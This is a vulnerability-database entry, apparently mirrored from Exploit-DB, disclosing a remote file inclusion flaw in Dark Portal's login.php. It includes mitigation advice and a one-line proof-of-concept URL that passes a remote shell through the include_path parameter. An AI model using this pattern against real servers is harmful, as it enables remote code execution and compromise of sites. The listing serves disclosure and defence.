header-logo
Suggest Exploit
vendor:
Dark Portal
by:
CoBRa_21
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Dark Portal
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Dark Portal (login.php) Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in the Dark Portal login.php script, which allows an attacker to include a remote file containing arbitrary code and execute it on the vulnerable server. The vulnerability is due to the include_path parameter not being properly sanitized before being used in a file inclusion call.

Mitigation:

Input validation should be used to prevent the inclusion of remote files. Additionally, the application should be configured to only include files from a limited set of directories.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------

Dark Portal (login.php) Remote File Inclusion Vulnerability

-------------------------------------------------------------------------------------
 
Author:    CoBRa_21
 
Mail:    uyku_cu@windowslive.com
 
Script Download:  http://sourceforge.net/projects/darkportal/
 
-------------------------------------------------------------------------------------
 
Exploit:
 
http://localhost/[PATH]/login.php?include_path= [Shell]

-------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR